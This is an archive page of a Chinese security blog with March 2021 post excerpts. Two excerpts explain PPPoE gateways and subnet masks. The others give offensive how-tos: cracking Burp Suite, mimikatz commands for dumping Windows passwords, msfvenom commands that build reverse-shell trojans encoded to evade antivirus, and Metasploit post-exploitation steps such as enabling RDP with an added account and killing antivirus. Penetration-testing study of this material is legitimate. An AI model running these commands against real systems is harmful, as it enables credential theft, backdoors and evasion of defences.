网站首页 发表在 2021年03月 的所有文章

  • Burpsuite系列 -- burp2021.03安装使用

    声明:该软件来源网络,仅供学习交流 一、下载地址:加入交流群 二、解压后,双击打开BurpSuite点击 三、打开BurpSuiteLoader,将license信息复制到过去,点击next 四、选择manual activation 五、copy request到activation request,再将activation response复制过去,点击next 六、点击完成,一路下一步 ...

    2021-03-05 538
  • windows密码获取 -- mimikatz

    一、软件介绍 一款获取windows账号密码的软件 二、下载地址(软件作者) https://github.com/gentilkiwi/mimikatz 或加入Kirin博客交流群下载 三、使用方法 1、解压后双击打开,分32位和64位 2、输入下面两行命令,直接获取密码 privilege::debug sekurlsa::logonpasswords ...

    2021-03-04 528
  • 为何主机的IP地址和网关一样还能上网?

    为什么IP地址和网关一样还能上网,这样默认路由不就是自己了吗? 电信的网,固定IP,给了一个公网地址,IP地址(中间隐藏了):60.*.*.239,掩码:255.255.255.0,网关:60.*.*.239,网关的地址和IP是一样的,这样的话默认路由的下一跳不就是自己了吗,但是可以上网,百度搜索IP显示的地址也和电信给的一样60.*.*.239。 这里的网关,可以是任何IP地址,如果你喜欢,可以换成6.6.6.6或8.8.8.8等幸运数字也是可以上网的。 为什么呢?这里使用了PPPoE拨号技术,在这台网络设备与电信NAS网关之间动态创建了一条P2P(Point to Point)的隧道。隧道的本地虚拟接口假设为VA1,所有非60.x.x.0/24网段的流量都会通过VA1接口流出本地。 为何要从VA1流出本地?因为系统创建一条默认路由,类似于: 0.0.0.0/0  ------------ >   VA1 VA1其实类似与ethernet接口。当我们使用ethernet接口来上网时,IP报文需要通过ethernet接口流出时,ethernet接口必须做的一件事是封装(Encapsulation): Ethernet+ IP报文 有读者说,封装之前,至少还需要目的MAC地址,不是吗?是的,需要ARP广播来发现网关的MAC地址,然后“Ethernet + IP报文“就可以流出网口了,对吗? Okay,当用户的IP报文需要从VA1接口流出时,VA1接口必须做的一件事也是封装: PPPoE + IP报文 然后呢,这个“PPPoE + IP报文“能长出翅膀飞走? 不能。 既然不能,那么这个报文最终还是要乖乖地从ethernet接口(网口)这个物理接口流出。既然要从ethernet接口流出,一定要遵守ethernet接口的潜规则,必须完成封装: Ethernet + PPPoE + IP报文 这里ethernet封装也需要目的MAC地址,对吗? 是的。 是否也需要使用ARP广播来发现NAS网关的MAC地址? 不需要。 为什么? 因为PPPoE握手协商阶段,已经通过Discovery、Offer等报文提前获得了PPPoE服务器(NAS网关)的MAC地址。既然知道了,就没有必要ARP广播了。 于是就发生了神奇的一幕,报文最终通过ethernet接口流出,但是竟然没有使用ARP广播。 当报文顺着ISP的接入网络一路流到NAS网关时,NAS网关干两件事:  剥离Ethernet封装,因为目的MAC地址是自己的,否则直接丢弃 剥离PPPoE封装,根据剩下的IP裸报文继续路由转发 网关的地方既然任何IP地址都可以,那能否是空白的? 应该不可以,如果空白,将不会有上文那条默认路由。 最后一点,NAS网关的下行方向的路由是什么样子的? 60.x.x.239/32  ------------ >   VAn 这里的网络掩码为何是32,而不是24? 欢迎加入交流群一起讨论!...

    2021-03-03 695
  • 同一个IP使用不同网络掩码,会发生什么?

    相同的ip用子网掩码可以分成不同的网络段,对于其他主机怎么区别呢?比如我现在想要访问192.168.100.50这个地址。现在网路上有两个这个ip,一个是192.168.100.50,子网掩码是255.255.255.0。另外一个子网掩码是255.255.254.0。这两个是不同的网络段,但是我的ip报头中目标地址是一样的,这个如何区别呢? 一个似曾相识的讨论题,值得讨论一下,讨论之前需要先行阅读它。 首先,在一个局域网内,一个IP地址只能用在一个地方,所以你将一个IP = 192.168.100.50 用在两个地方是不符合规范的。 你不会觉得192.168.100.50/24 与192.168.100.50/23 是两个IP地址吧? 虽然它使用不同的网络掩码,但192.168.100.50依然还是192.168.100.50啊! 如果可以使用不同的网络掩码把一个IP地址(1.1.1.1)变成多个IP地址,IP地址也不至于那么快枯竭。 网络掩码的真实含义1.1.1.1/32    代表IP = 1.1.1.1 是网段1.1.1.1/32的一个成员,网段里共1个成员。1.1.1.1./31    代表IP = 1.1.1.1 是网段1.1.1.0/31的一个成员,网段里共2个成员。.。。。1.1.1.1./24    代表IP = 1.1.1.1 是网段1.1.1.0/24的一个成员,网段里共256个成员。1.1.1.1./16    代表IP = 1.1.1.1 是网段1.1.0.0/16的一个成员,网段里共65536个成员。1.1.1.1./8    代表IP = 1.1.1.1 是网段1.0.0.0/8的一个成员,网段里共16777216个成员。 所以IP地址的网络掩码,只是表示这个IP地址所在网络的大小,即成员数的多少。 回到问题本身,192.168.100.50/24 与192.168.100.50/23相比,谁的网络成员多? 当然是后者,即192.168.100.50/23,后者是前者的2倍。 当试图访问192.168.100.50这个IP地址时,有两个route option,一个指向192.168.100.50/24的网关,另一个指向192.168.100.50/23的网关,你觉得哪个更精准一点? 当然是前者,前者的范围更小。 在路由表的优选算法里,哪条路由表条目与IP报文的目的IP更精准匹配,谁更优。 所以访问192.168.100.50的流量,全部会转发到192.168.100.50/24,而不会到192.168.100.50/23。除了与192.168.100.50/23同网段的流量除外。...

    2021-03-03 596
  • Metasploit -- 生成木马(msfvenom)

    作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个NOP滑动长度 -f, --format <format> 指定输出格式 (使用 --list formats 来获取msf支持的输出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(编码器) -a, --arch <architecture> 指定payload的目标架构 --platform <platform> 指定payload的目标平台 -s, --space <length> 设定有效攻击荷载的最大长度 -b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039; -i, --iterations <count> 指定payload的编码次数 -c, --add-code <path> 指定一个附加的win32 shellcode文件 -x, --template <path> 指定一个自定义的可执行文件作为模板 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项 -o, --out <path> 保存payload -v, --var-name <name> 指定一个自定义的变量,以确定输出格式 --shellest 最小化生成payload -h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表 2、以windows为例 基础命令格式 windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=8787 -f exe > shell.exe 加上编码(达到免杀效果) msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 LHOST=192.168.139.131 LPORT=4444 -f exe > 1.exe 3、连接生成的木马 选择攻击模块(exploit/multi/handler) 设置payload和上面的一样 4、目标主机运行木马 注意: msf exploit(multi/handler) > set ExitOnSession false    //可以在接收到seesion后继续监听端口,保持侦听。 防止session意外退出 msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0   //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0 msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭 ...

    2021-03-02 633
  • Metasploit -- 后渗透模块(POST)

    作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 run post/windows/gather/enum_applications 4、获取用户登录信息 run post/windows/gather/enum_logged_on_users 5、对目标进行漏洞扫描 run post/multi/recon/local_exploit_suggester 6、收集系统环境信息 run post/multi/gather/env 7、查看开启的服务 run post/windows/gather/enum_services 8、查看目标主机最近的操作 run post/windows/gather/dumplinks 9、其他操作 删除用户 run post/wndows/manage/delete_user username=aiyou 添加账户 run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou 关闭杀软 windows/manage/killav ...

    2021-03-01 567

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注